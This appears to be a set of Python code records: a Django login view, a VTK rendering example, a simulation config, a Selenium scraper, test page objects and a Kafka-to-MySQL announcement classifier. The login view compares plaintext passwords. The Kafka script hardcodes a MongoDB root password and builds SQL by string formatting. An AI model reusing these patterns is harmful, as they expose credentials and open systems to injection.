pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass GuardLogin(APIView):\n def post(self, request, format=None):\n email = request.data['email']\n password = request.data['password']\n if email and password:\n user = Guard.objects.filter(email=email).filter(password=password)\n if user.exists():\n res = {\n 'msg': 'Login successful',\n 'error': 0,\n 'success': 1,\n 'id': user[0].id\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_200_OK)\n else:\n res = {\n 'msg': 'Login unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n else:\n res = {\n 'msg': 'No credentials found',\n 'error': 2,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"vecurityapi/vecurityapiapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565474380","text":"#!/usr/bin/env python\n\n\n# import os\n\nimport vtk\n# from vtk.util.misc import vtkGetDataRoot\n# VTK_DATA_ROOT = vtkGetDataRoot()\n\n\n\n\n# try:\n # VTK_DATA = os.environ['VTK_DATA']\n# except KeyError:\n # VTK_DATA = '../../../vtkdata/'\n\n# from libVTKCommonPython import *\n# from libVTKGraphicsPython import *\n\n# Example demonstrates use of abstract vtkDataSetToDataSetFilter\n# (i.e., vtkElevationFilter - an abstract filter)\n\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(12)\nsphere.SetThetaResolution(12)\n\ncolorIt = vtk.vtkElevationFilter()\ncolorIt.SetInput(sphere.GetOutput())\ncolorIt.SetLowPoint(0,0,-1)\ncolorIt.SetHighPoint(0,0,1)\n\n\n\nplyW = vtk.vtkPLYWriter ()\nplyW.SetFileTypeToASCII ()\nplyW.SetInput (colorIt.GetPolyDataOutput())\nplyW.SetFileName (\"sph.ply\")\nplyW.Write()\n\n\n\npolyW = vtk.vtkPolyDataWriter ()\npolyW.SetFileTypeToASCII ()\npolyW.SetInput (colorIt.GetPolyDataOutput())\npolyW.SetFileName (\"sph.vtk\")\npolyW.Write()\n\n\n\n\n\n\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInput(colorIt.GetPolyDataOutput())\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\nren.AddActor(actor)\nren.SetBackground(1,1,1)\nrenWin.SetSize(400,400)\nren.GetActiveCamera().Zoom(1.4)\n\niren.Initialize()\n\niren.Start()\n\n","sub_path":"idea/src/vtkUtilities/conversion/osgdb_vtk/testData/src/ColorSphOut.py","file_name":"ColorSphOut.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"485126012","text":"import sys\nfrom pdt.train_tf import *\nfrom wacacore.util.io import handle_args\nfrom tensortemplates.module import template_module, nl_module\nimport os\n\ndef default_benchmark_options():\n \"Get default options for pdt training\"\n options = {}\n options['num_iterations'] = (int, 1000)\n options['save_every'] = (int, 100)\n options['batch_size'] = (int, 512)\n options['dirname'] = (str, \"dirname\")\n options['datadir'] = (str, os.path.join(os.environ['DATADIR'], \"pdt\"))\n return options\n\n\ndef game_options(adt):\n options = {}\n if adt == 'atari':\n options['game'] = (str, 'Breakout-v0')\n return options\n","sub_path":"examples/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313275212","text":"# coding:utf-8\nimport sys\nimport Cptool.config\n\n\nclass ToolConfig:\n class ConstError(PermissionError):\n pass\n\n class ConstCaseError(ConstError):\n pass\n\n def __setattr__(self, name, value):\n if name in self.__dict__:\n raise self.ConstError(\"can't change const %s\" % name)\n if not name.isupper():\n raise self.ConstCaseError('const name \"%s\" is not all uppercase' % name)\n self.__dict__[name] = value\n\n\ntoolConfig = ToolConfig()\n# SITL Type PX4 and Ardupilot\n# {'PX4','Ardupilot'}\ntoolConfig.MODE = 'Ardupilot'\n# Simulation Type\n# Ardupilot : ['Airsim', 'Morse', 'Gazebo', 'SITL']\n# PX4 : ['Jmavsim']\ntoolConfig.SIM = 'SITL'\n# Simulation Speed\ntoolConfig.SPEED = 10\n# Output Debug Message\ntoolConfig.DEBUG = True\n# Wind Speed range\ntoolConfig.WIND_RANGE = [8, 10.7]\n# GUI Windows size\ntoolConfig.HEIGHT = 640\ntoolConfig.WEIGHT = 480\n# Mission flight attitude range\ntoolConfig.LIMIT_H = 50\ntoolConfig.LIMIT_L = 40\n# Copter LOG Path\ntoolConfig.ARDUPILOT_LOG_PATH = '/media/rain/data'\n# PX4 LOG Path\ntoolConfig.PX4_LOG_PATH = '/home/rain/PX4-Autopilot'\n# Mavlink Part\ntoolConfig.LOG_MAP = ['IMU', 'ATT', 'RATE', 'PARM']\n# LOG_MAP = ['ATT', 'RATE']\ntoolConfig.PARAM = [\n \"PSC_POSXY_P\",\n \"PSC_VELXY_P\",\n \"PSC_POSZ_P\",\n \"ATC_ANG_RLL_P\",\n \"ATC_ANG_PIT_P\",\n \"ATC_ANG_YAW_P\",\n \"ATC_RAT_RLL_I\",\n \"ATC_RAT_RLL_D\",\n \"ATC_RAT_RLL_P\",\n \"ATC_RAT_PIT_P\",\n \"ATC_RAT_PIT_I\",\n \"ATC_RAT_PIT_D\",\n \"ATC_RAT_YAW_P\",\n \"ATC_RAT_YAW_I\",\n \"ATC_RAT_YAW_D\",\n \"WPNAV_SPEED\",\n \"WPNAV_SPEED_UP\",\n \"WPNAV_SPEED_DN\",\n \"WPNAV_ACCEL\",\n \"ANGLE_MAX\",\n]\n","sub_path":"Cptool/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"407713425","text":"from selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport sys, os\r\nimport re\r\n\r\nclass Available_time_finder:\r\n def __init__(self, url, area, number_results):\r\n self.url = url\r\n self.area = area\r\n self.number_results = number_results\r\n print(\"Loading browser driver...\")\r\n self.load_driver(\"firefox\")\r\n self.connected = False\r\n #self.connect()\r\n # self.get_results()\r\n # self.close_driver()\r\n\r\n def load_driver(self, browser):\r\n _platform = sys.platform\r\n if _platform == \"linux\" or _platform == \"linux2\": # linux\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_linux')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_linux')\r\n elif _platform == \"darwin\": # MAC OS X\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_mac')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_mac')\r\n elif _platform == \"win32\" or _platform == \"win64\": # Windows\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_win')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_win')\r\n\r\n if browser == 'firefox':\r\n try:\r\n from selenium.webdriver.firefox.options import Options\r\n firefox_options = Options()\r\n firefox_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Firefox(executable_path=firefox_driver_path, firefox_options=firefox_options)\r\n print(\"Loaded firefox driver.\")\r\n except Exception as e:\r\n if 'executable needs to be in PATH' in str(e): #driver not found\r\n msg = \"Firefox webdriver is missing! Try reinstalling the program.\"\r\n print(msg)\r\n sys.exit(1)\r\n else:\r\n self.load_driver('chrome')\r\n elif browser == 'chrome':\r\n try:\r\n from selenium.webdriver.chrome.options import Options\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Chrome(executable_path=chrome_driver_path, chrome_options=chrome_options)\r\n print(\"Loaded chrome driver.\")\r\n except Exception as e:\r\n print(e)\r\n if 'executable needs to be in PATH' in str(e): #driver not found\r\n msg = \"Chrome webdriver is missing! Try reinstalling the program.\"\r\n print(msg)\r\n sys.exit(1)\r\n else:\r\n self.load_driver(None)\r\n else:\r\n msg = \"To use extensive run either Firefox or Chrome browser should be installed!\"\r\n print(msg)\r\n sys.exit(1)\r\n\r\n def connect(self):\r\n print(\"Connecting...\")\r\n if not self.connected:\r\n self.driver.get(self.url)\r\n self.driver.find_element_by_name(\"NextButtonID20\").click()\r\n self.driver.find_element_by_name(\"AcceptInformationStorage\").click()\r\n self.driver.find_element_by_xpath(\"//div[@class='btn-toolbar']//input[@name='Next']\").click()\r\n self.connected = True\r\n options = Select(self.driver.find_element_by_id('SectionId'))\r\n options.select_by_visible_text(self.area)\r\n print(\"Found source.\")\r\n\r\n def get_results(self):\r\n try:\r\n self.driver.find_element_by_name(\"TimeSearchFirstAvailableButton\").click()\r\n except:\r\n self.connected = False\r\n self.connect()\r\n self.page_source = self.driver.page_source\r\n self.soup = BeautifulSoup(self.page_source, 'html.parser')\r\n cells = self.soup.find_all('div', {\"data-function\":\"timeTableCell\"})\r\n available_times = []\r\n for cell in cells:\r\n if cell[\"aria-label\"] != \"Bokad\":\r\n available_times.append(cell[\"aria-label\"])\r\n def getKey(item):\r\n return re.findall(r'\\b\\d+\\b', item)\r\n available_times = sorted(available_times, key=getKey)\r\n res = []\r\n for i in range(self.number_results):\r\n if i < len(available_times):\r\n res.append(available_times[i])\r\n return res\r\n\r\n def close_driver(self):\r\n self.driver.stop_client()\r\n self.driver.close()\r\n self.driver.quit()\r\n\r\nif __name__ == '__main__':\r\n url = \"https://ventus.enalog.se/Booking/Booking/Index/skane\"\r\n area = \"Lund\"\r\n number_results = 10\r\n Available_time_finder(url, area, number_results)\r\n\r\n","sub_path":"available_time_finder.py","file_name":"available_time_finder.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"153807297","text":"import time\n\nfrom amaysim_fw.pages.basepage import BasePage\n\n\nclass NewPlanPage(BasePage):\n\n def __init__(self, driver):\n self.driver = driver\n\n locator_dict = {\n \"keep current number\": (\"//*[contains(text(), 'Keep your current number')]\", \"xpath\"),\n \"get new number\": (\"//*[contains(text(), 'Get a new number')]\", \"xpath\"),\n \"current number\": (\"previous_mobile_number_info_number\", \"id\"),\n \"provider\": (\"previous_mobile_number_info_provider\", \"id\"),\n \"prepaid\": (\"//*[contains(text(), 'Prepaid')]\", \"xpath\"),\n \"postpaid\": (\"//*[contains(text(), 'Postpaid')]\", \"xpath\"),\n \"dob\": (\"previous_mobile_number_info_number_dob\", \"id\"),\n \"accnt number\": (\"previous_mobile_number_info_account_number\", \"id\"),\n \"authorise\": (\"//*[contains(text(), 'authorise amaysim')]\", \"xpath\"),\n \"new number\": (\"selected-number\", \"id\"),\n \"submit\": (\"step-plan\", \"id\")\n }\n\n def setup_prepaid_using_current_number(self, number, provider, dob):\n self.click_element(*self.locator_dict[\"keep current number\"])\n self.send_text(*self.locator_dict[\"current number\"], number)\n self.select_dropdown_value(*self.locator_dict[\"provider\"], provider)\n self.click_element(*self.locator_dict[\"prepaid\"])\n # this is only a workaround as the appliciation offsets the value being sent by selenium\n self.send_text_with_delay(*self.locator_dict[\"dob\"], dob[-1] + dob[0:-1])\n self.click_element(*self.locator_dict[\"authorise\"])\n self.click_element(*self.locator_dict[\"submit\"])\n self.wait_for_page_to_load()\n\n def setup_postpaid_using_current_no(self, number, provider, accnt_no):\n self.click_element(*self.locator_dict[\"keep current number\"])\n self.send_text(*self.locator_dict[\"current number\"], number)\n self.select_dropdown_value(*self.locator_dict[\"provider\"], provider)\n self.click_element(*self.locator_dict[\"postpaid\"])\n self.send_text(*self.locator_dict[\"accnt number\"], accnt_no)\n self.click_element(*self.locator_dict[\"authorise\"])\n self.click_element(*self.locator_dict[\"submit\"])\n self.wait_for_page_to_load()\n\n def setup_new_no(self):\n self.click_element(*self.locator_dict[\"get new number\"])\n self.click_element(*self.locator_dict[\"submit\"])\n self.wait_for_page_to_load()\n\n","sub_path":"pages/userpages/newmobileplan/new_plan_page.py","file_name":"new_plan_page.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"183547812","text":"nums=list(range(10))\n# squares=[i**2 for i in nums]\n# #printing squares\n# print(\"\\nPrinting squares of nums\\n\")\n# for element in squares:\n# print(element,end=\" \")\n# print(\"\\nPrinting odd numbers\\n\")\n# odd_numbers =[2*i -1 for i in nums]\n# for element in odd_numbers:\n# print(element,end=\" \")\n#\n# print(\"\\nPrinting even numbers:\\n\")\n# even_numbers =[2*i for i in nums]\n# for element in even_numbers:\n# print(element,end= \" \")\n\n# my_list=[]\n# for letter in 'abcd':\n# for number in range(4):\n# my_list.append((letter,number))\n# print(my_list)\n# names=['Bruce','Clark','Peter','Logan','Wade']\n# heros=['Batman','Superman','Spiderman','Wolverine','Deadpool']\n#\n# my_dict={}\n# for name,hero in zip(names,heros):\n# my_dict[name]=hero\n# print(my_dict)\n# my_dict={name: hero for name,hero in zip(names,heros)}\n# print(my_dict)\n#creating generators in python\n\ndef gen_func(nums):\n for i in nums:\n yield i*i\nmy_gen=gen_func(nums)\nfor i in my_gen:\n print(i)\n#generator expression\nmy_gen2=(n*n for n in nums)\n# the same loops can be applied to my_gen2\nprint(\"+\"*20)\nfor i in my_gen2:\n print(i)\n","sub_path":"list_comprehensions.py","file_name":"list_comprehensions.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"162393438","text":"# -*- coding: utf-8 -*-\n# @Author : wgq\n# @time : 2020/8/10 17:47\n# @File : kafka_a.py\n# Software: PyCharm\n\"\"\"\n新三板-基于mongoshake =>> kafka 的流处理\n1.读取kafka的数据\n2.读取全称表的数据生成date数据\n3.将kfka数据中的简称取出 -> 在全称的date匹配对应的全称 -> 将全称保存一个变量\n4.利用全称进入行业表中进行关联查询 -> 获取行业信息保存变量\n5.将分类表中的信息读出 -> 转成dateframe格式\n6.利用kafka中的title信息 -> 和dateframe数据进行匹配 -> 获取到分类信息-情感分值-重要度分值 -> 利用分值匹配名称\n ↓\n →在每一次匹配时-都要检测分类表是否发生变化-发生变化-更新dateframe\n7.将以保存的变量整合成需要的列表 -> 进行保存\n\"\"\"\nfrom kafka import KafkaConsumer\nimport json\nfrom mysql_yi import mysql_kafka_sq\nfrom kafka.structs import TopicPartition\nfrom bson import BSON\nimport pandas as pd\nfrom mysql_yi.mysql_pool import PymysqlPool\nimport uuid\nimport pymysql\nimport time, datetime\nimport pymongo\n\nclass Kafka_consumer_s():\n def __init__(self):\n \"\"\"\n self.consumer:kafka-连接对象\n self.page:kafka-消费偏移量\n self.emo_label:情感分值-标签\n self.imp_label:重要程度分值-标签\n self.full_name_date:全称表的数据\n self.df:分类表的数据\n self.companyName:全称\n self.mysql_full_name:行业数据\n self.title:标题\n self.srcUrl:网源链接\n self.pubTime:发布时间\n self.cmpCode:简称代码\n self.yqid:唯一标识\n self.srcType:数据类型\n self.webname:来源\n self.cmpShortName:简称\n self.emoConf:置信度 A股信息没有\n self.firstLevelCode:一级分类编码\n self.firstLevelName:一级分类名称\n self.secondLevelCode:二级分类编码\n self.secondLevelName:二级分类名称\n self.threeLevelCode:三级分类编码\n self.threeLevelName:三级分类名称\n self.fourLevelCode:四级分类编码\n self.fourLevelName:司机分类名称\n self.eventCode:舆情事件分类编码\n self.eventName:舆情事件分类名称\n self.emoScore:情感分值\n self.emolabel:情感标签\n self.impScore:重要程度分值\n self.impLabel:重要程度标签\n self.comp_info:行业分级字典\n self.onlyId:mongo主键\n self.mydict : 储存的mongo数据\n\n \"\"\"\n self.consumer = KafkaConsumer(\"a_gu_add\",bootstrap_servers = [\"192.168.1.172:9092\"],auto_offset_reset='earliest')\n self.myclient = pymongo.MongoClient(\"mongodb://root:shiye1805A@192.168.1.125:10011,192.168.1.126:10011,192.168.1.127:10011/admin\")\n\n self.page = 0\n self.emo_label = {'1': '正向', '-1': '负向', '0': '中性'}\n self.imp_label = {'1': '相对不重要', '2': '相对不重要', '3': '相对不重要', '4': '重要', '5': '非常重要'}\n self.full_name_date = {}\n self.df = \"\"\n self.companyName = \"\"\n self.mysql_full_name = ()\n self.title = \"\"\n self.srcUrl = \"\"\n self.pubTime = \"\"\n self.cmpCode = \"\"\n self.yqid = \"\"\n self.srcType = \"\"\n self.webname = \"\"\n self.cmpShortName = \"\"\n self.emoConf = \"\"\n self.firstLevelCode = \"\"\n self.secondLevelCode = \"\"\n self.secondLevelName = \"\"\n self.threeLevelCode = \"\"\n self.threeLevelName = \"\"\n self.fourLevelCode = \"\"\n self.fourLevelName = \"\"\n self.eventCode = \"\"\n self.eventName = \"\"\n self.emoScore = \"\"\n self.emolabel = \"\"\n self.impScore = \"\"\n self.impLabel = \"\"\n self.comp_info = {}\n self.onlyId = \"\"\n self.mydict = {}\n\n def mysql_client(self):\n return PymysqlPool('129')\n def mysql_l(self):\n \"\"\"\n 连接行业表获取行业数据\n :param cmpShortName:\n :return:\n \"\"\"\n if self.companyName:\n conn = PymysqlPool('industry')\n sql = \"SELECT A.compName, A.categoryCode, B.constValueDesc, B.constCode FROM(SELECT * FROM seeyii_assets_database.sy_cd_ms_ind_comp_gm WHERE compName = '{}') AS A INNER JOIN ( SELECT * FROM seeyii_assets_database.sy_cd_mt_sys_const WHERE constCode IN ( 3, 4, 5 ) ) AS B ON A.categoryCode = B.cValue\".format(\n self.companyName)\n counts, infos = conn.getAll(sql)\n return infos\n else:\n return \"\"\n\n def mysq_related_query_z(self):\n \"\"\"\n 连接全称表\n 连接A_stock_code_name_fyi获取信息\n :return: 需要的date数据\n \"\"\"\n if self.full_name_date:\n pass\n else:\n print(\"第一次构件名称字典\")\n conn = self.mysql_client()\n commpany_map = {}\n sql = \"select * from EI_BDP.A_stock_code_name_fyi;\"\n count, infos = conn.getAll(sql)\n for info in infos:\n commpany_map[info['all_name']] = info['short_name']\n conn.dispose()\n self.full_name_date = commpany_map\n def date_c(self,get_value):\n \"\"\"\n 将全称表做成date\n :param get_value: 数据\n :return: date\n \"\"\"\n if get_value in self.full_name_date.values():\n self.companyName = list(self.full_name_date.keys())[list(self.full_name_date.values()).index(get_value)]\n print(self.companyName)\n else:\n print(self.companyName)\n def kafka_take_out(self):\n \"\"\"\n 连接kafka获取数据 将数据装换成字符串\n :return:\n \"\"\"\n\n for each in self.consumer:\n # try:\n kafa_str = BSON.decode(each.value)\n if kafa_str:\n self.kafka_data_processing(kafa_str)\n # except:\n # print(each.value, \"错误的数据\")\n\n def kafka_data_processing(self,kafka_json):\n \"\"\"\n 处理数据 比对两个表\n :param kafka_json: 字典\n :return:\n \"\"\"\n\n if kafka_json.get(\"o\"):\n kafka_set = kafka_json.get(\"o\")\n if kafka_set.get(\"$set\"):\n pass\n else:\n self.page += 1\n print(self.page,\"+++++++++++++++++++++++++++++++++++++++++++++++++\")\n kafka_of = kafka_json.get(\"o\")\n cmpShortName = kafka_of.get(\"stock_name\")\n cmpCode = kafka_of.get(\"stock_code\")\n title = kafka_of.get(\"title\")\n pubTime = kafka_of.get(\"etl_time\")\n srcUrl = kafka_of.get(\"url\")\n self.title = title\n self.srcUrl = srcUrl\n self.pubTime = pubTime\n self.cmpCode = cmpCode\n self.cmpShortName = cmpShortName\n print(self.cmpShortName)\n \"----------------------\"\n self.mysq_related_query_z()\n \"----------------------\"\n self.date_c(cmpShortName)\n \"----------------------\"\n mysql_full_name = self.mysql_l()\n self.mysql_full_name = mysql_full_name\n \"----------------------\"\n self.pd_dataframe(title)\n\n def logs_dateframe(self):\n \"\"\"\n 检测分类表数据是否发生变化\n :return: 状态 False:有变化 True:无变化\n \"\"\"\n with open(\"/shiye_kf3/gonggao/kafka_stream/logs/log_a.log\",\"r\") as r:\n date_time = r.read()\n print(date_time)\n conn = self.mysql_client()\n sql = \"SELECT count(id) FROM sy_yq_raw.sy_yq_lvl_rules_code WHERE modifyTime >= '{}'\".format(date_time)\n count, infos = conn.getAll(sql)\n conn.dispose()\n dateArray = datetime.datetime.fromtimestamp(time.time())\n otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\n page = infos[0][\"count(id)\"]\n print(page,\"每次查询的分类表变化数量\")\n with open(\"/shiye_kf3/gonggao/kafka_stream/logs/log_a.log\",\"w\") as w:\n w.write(otherStyleTime)\n if page > 0:\n return False\n else:\n return True\n\n def pd_dataframe(self,test):\n \"\"\"\n 获取dateframe数据进行处理\n :param test:\n :return:\n \"\"\"\n if test:\n if len(self.df):\n pass\n else:\n self.pandsa()\n print(\"第一次进入\")\n print(self.len_list)\n bool_if = self.logs_dateframe()\n if bool_if:\n pass\n print(\"分类表数据无变化\")\n else:\n self.pandsa()\n print(\"分类表存在变化--对dateframe进行修改\")\n for i in range(self.len_list):\n inRules_list = [self.df.loc[i,\"inRules\"]][0]\n filterRules_list = [self.df.loc[i, \"filterRules\"]][0]\n in_list = [rule.strip() for rule in inRules_list.split('、') if inRules_list]\n in_lists = [rule.split('&') for rule in in_list]\n filter_rules = [[rule.strip()] for rule in filterRules_list.split('、') if filterRules_list]\n if_csv = self.list_if(in_lists,filter_rules,test)\n if if_csv:\n print(\"需要存储\")\n self.pands_dateframe_csv(i)\n else:\n pass\n def list_if(self,in_lists,filter_rules,test):\n\n \"\"\"\n 对传传入的数据进项判断\n :param in_lists: 符合要求的规则 判断test中的数据是否符合要求\n :param filter_rules: 过滤的规则 判断test中的数据是否不符合要求\n :param test: 标题\n :return:\n \"\"\"\n is_match = False\n for words in in_lists:\n result = self.pandas_dataframe_if(words, test)\n if result == words:\n is_match = True\n break\n if filter_rules and is_match:\n for fwords in filter_rules:\n filter_result = self.pandas_dataframe_if(fwords, test)\n if filter_result == fwords:\n is_match = False\n break\n return is_match\n def pandas_dataframe_if(self,words,test):\n \"\"\"\n 处理已被切割的数据 讲判断结果返回调用方\n :param words:\n :param test:\n :return:\n \"\"\"\n result = []\n for word in words:\n if word in test:\n result.append(word)\n return result\n def pandsa(self):\n \"\"\"\n 将从分类表中的数据取出 转换成dateframe\n :return:\n \"\"\"\n conn = self.mysql_client()\n sql = \"SELECT id,firstLevelCode,firstLevelName,secondLevelCode,secondLevelName,threeLevelCode,threeLevelName,fourLevelCode,fourLevelName,cfEventCode,eventCode,eventName,inRules,filterRules,emoScore,impScore,isChange,isValid,dataStatus FROM sy_yq_raw.sy_yq_lvl_rules_code WHERE inRules != '' and inRules IS NOT NULL\"\n count, infos = conn.getAll(sql)\n conn.dispose()\n self.len_list = len(infos)\n df = pd.DataFrame(data=infos,columns=[\"id\",\"firstLevelCode\",\"firstLevelName\",\"secondLevelCode\",\"secondLevelName\",\"threeLevelCode\",\"threeLevelName\",\"fourLevelCode\",\"fourLevelName\",\"cfEventCode\",\"eventCode\",\"eventName\",\"inRules\",\"filterRules\",\"emoScore\",\"impScore\",\"isChange\",\"isValid\",\"dataStatus\"])\n self.df = df\n def mysql_full_name_data(self):\n self.comp_info = {}\n if self.mysql_full_name:\n for sin in self.mysql_full_name:\n if sin.get(\"constCode\") == 3:\n self.comp_info['firstIndustry'] = sin.get(\"constValueDesc\")\n self.comp_info['firstIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n elif sin.get(\"constCode\") == 4:\n self.comp_info['secondIndustry'] = sin.get(\"constValueDesc\")\n self.comp_info['secondIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n elif sin.get(\"constCode\") == 5:\n self.comp_info['threeIndustry'] = sin.get(\"constValueDesc\")\n self.comp_info['threeIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n def pands_dateframe_csv(self,i):\n \"\"\"\n 将结果保存\n :param i: dateframe数据定位\n :return:\n \"\"\"\n self.webname = \"巨潮资讯网\"\n self.srcType = \"A股公告\"\n print(self.title)\n if self.title:\n self.mysql_full_name_data()\n self.yqid = self.add_uuid(self.title + self.srcUrl + self.pubTime)\n self.firstLevelCode = self.df.loc[i, \"firstLevelCode\"]\n self.firstLevelName = self.df.loc[i, \"firstLevelName\"]\n self.secondLevelCode = self.df.loc[i, \"secondLevelCode\"]\n self.secondLevelName = self.df.loc[i, \"secondLevelName\"]\n self.threeLevelCode = self.df.loc[i, \"threeLevelCode\"]\n self.threeLevelName = self.df.loc[i, \"threeLevelName\"]\n self.fourLevelCode = self.df.loc[i, \"fourLevelCode\"]\n if self.df.loc[i, \"fourLevelName\"]:\n self.fourLevelName = self.df.loc[i, \"fourLevelName\"]\n else:\n self.fourLevelName = \"\"\n self.eventCode = self.df.loc[i, \"eventCode\"]\n self.eventName = self.df.loc[i, \"eventName\"]\n self.emoScore = self.df.loc[i, \"emoScore\"]\n self.impScore = self.df.loc[i, \"impScore\"]\n list_g = self.list_mysql_g_gao()\n list_yu = self.list_mysql_u_s()\n print(list_g)\n print(\"``````````````\")\n print(list_yu)\n self.mysql_insert_g_gao(list_g)\n self.mysql_insert_u_yuqing(list_yu)\n self.mongo_insert()\n def list_mysql_g_gao(self):\n \"\"\"\n 将数据组合 组合成公告表需要的结构\n :return:\n \"\"\"\n list_mysql_g_s = []\n list_mysql_g = []\n list_mysql_g.append(self.yqid)\n list_mysql_g.append(self.title)\n list_mysql_g.append(self.webname)\n list_mysql_g.append(self.companyName)\n list_mysql_g.append(self.cmpShortName)\n list_mysql_g.append(self.cmpCode)\n list_mysql_g.append(\"\")\n list_mysql_g.append(\"\")\n list_mysql_g.append(\"\")\n list_mysql_g.append(self.comp_info.get(\"firstIndustry\",\"\"))\n list_mysql_g.append(self.comp_info.get(\"firstIndustryCode\",\"\"))\n list_mysql_g.append(self.comp_info.get(\"secondIndustry\",\"\"))\n list_mysql_g.append(self.comp_info.get(\"secondIndustryCode\",\"\"))\n list_mysql_g.append(self.comp_info.get(\"threeIndustry\",\"\"))\n list_mysql_g.append(self.comp_info.get(\"threeIndustryCode\",\"\"))\n list_mysql_g.append(self.firstLevelCode)\n list_mysql_g.append(self.firstLevelName)\n list_mysql_g.append(self.secondLevelCode)\n list_mysql_g.append(self.secondLevelName)\n list_mysql_g.append(self.threeLevelCode)\n list_mysql_g.append(self.threeLevelName)\n list_mysql_g.append(self.fourLevelCode)\n list_mysql_g.append(self.fourLevelName)\n list_mysql_g.append(self.eventCode)\n list_mysql_g.append(self.eventName)\n list_mysql_g.append(self.emoScore)\n self.emolabel = self.emoLabel_i()\n list_mysql_g.append(self.emolabel)\n list_mysql_g.append(self.emoConf)\n list_mysql_g.append(self.impScore)\n self.impLabel = self.impLabel_i()\n list_mysql_g.append(self.impLabel)\n list_mysql_g.append(self.srcType)\n list_mysql_g.append(self.srcUrl)\n list_mysql_g.append(self.pubTime)\n list_mysql_g_s.append(list_mysql_g)\n return list_mysql_g_s\n def list_mysql_u_s(self):\n \"\"\"\n 将数据组合成 舆情表需要的结构\n :return:\n \"\"\"\n transScore = \"\"\n relPath = \"\"\n personName = \"\"\n relType = \"直接关联\"\n summary = \"\"\n keyword = \"\"\n content = \"\"\n relScore = \"\"\n relLabel = \"\"\n list_mysql_u_s = []\n list_mysql_u = []\n list_mysql_u.append(self.yqid)\n list_mysql_u.append(self.companyName)\n list_mysql_u.append(self.cmpShortName)\n list_mysql_u.append(self.cmpCode)\n list_mysql_u.append(self.companyName)\n list_mysql_u.append(transScore)\n list_mysql_u.append(relPath)\n list_mysql_u.append(relType)\n list_mysql_u.append(relScore)\n list_mysql_u.append(relLabel)\n list_mysql_u.append(personName)\n list_mysql_u.append(self.eventCode)\n list_mysql_u.append(self.eventName)\n list_mysql_u.append(self.firstLevelCode)\n list_mysql_u.append(self.firstLevelName)\n list_mysql_u.append(self.secondLevelCode)\n list_mysql_u.append(self.secondLevelName)\n list_mysql_u.append(self.threeLevelCode)\n list_mysql_u.append(self.threeLevelName)\n list_mysql_u.append(self.fourLevelCode)\n list_mysql_u.append(self.fourLevelName)\n self.emolabel = self.emoLabel_i()\n list_mysql_u.append(self.emolabel)\n list_mysql_u.append(self.emoScore)\n list_mysql_u.append(self.emoConf)\n list_mysql_u.append(self.impScore)\n self.impLabel = self.impLabel_i()\n list_mysql_u.append(self.impLabel)\n list_mysql_u.append(self.pubTime)\n list_mysql_u.append(self.title)\n list_mysql_u.append(summary)\n list_mysql_u.append(keyword)\n list_mysql_u.append(self.srcUrl)\n list_mysql_u.append(self.srcType)\n list_mysql_u.append(self.webname)\n list_mysql_u.append(content)\n list_mysql_u_s.append(list_mysql_u)\n return list_mysql_u_s\n def impLabel_i(self):\n \"\"\"\n 重要度处理\n :param impScore: 重要度分值\n :return: 重要度标签\n \"\"\"\n imp_label = self.imp_label.get(str(self.impScore))\n return imp_label\n def emoLabel_i(self):\n \"\"\"\n 情感处理\n :param emoScore: 情感分值\n :return: 情感标签\n \"\"\"\n emo_label = self.emo_label.get(str(self.emoScore))\n return emo_label\n def add_uuid(self,data):\n \"\"\"\n 对字符串进行加密\n :return: 加密字符串\n \"\"\"\n data = uuid.uuid3(uuid.NAMESPACE_DNS, data)\n data = str(data)\n result_data = data.replace('-', '')\n return result_data\n\n def mysql_insert_g_gao(self,result):\n \"\"\"\n 储存数据 公告表\n :param result:\n :return:\n \"\"\"\n conn = 